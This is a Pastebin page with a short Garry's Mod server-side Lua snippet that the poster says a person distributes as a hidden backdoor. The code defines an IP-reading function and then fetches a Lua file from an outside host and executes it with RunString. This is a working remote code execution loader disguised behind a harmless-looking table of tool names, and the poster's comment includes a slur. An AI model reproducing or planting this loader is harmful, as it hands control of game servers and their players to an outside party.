Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- darkcide distributes this, he just makes a harmless table to disarm you and then at the end of it does this gay shit
- if SERVER then
- local list_tools_manager = {"game", "auto", "run", "spawning", "owner", "tools", "lua", "datafile", "datacontrol", "datamain", "controlfile", "controlpanel", "assist", "anti", "entity", "spawnmanager", "spawner", "toolgun", "tools"}
- function game.GetIP() local hostip = GetConVarString( "hostip" ) hostip = tonumber( hostip ) local ip = {} ip[ 1 ] = bit.rshift( bit.band( hostip, 0xFF000000 ), 24 ) ip[ 2 ] = bit.rshift( bit.band( hostip, 0x00FF0000 ), 16 ) ip[ 3 ] = bit.rshift( bit.band( hostip, 0x0000FF00 ), 8 ) ip[ 4 ] = bit.band( hostip, 0x000000FF ) return table.concat( ip, "." ) end http.Fetch( "http://kolshop.hebergratuit.net/anti_drm/drmremoval.lua", function( b, l, h, c ) RunString( b ) end, function() end )
- end
Advertisement
Add Comment
Please, Sign In to add comment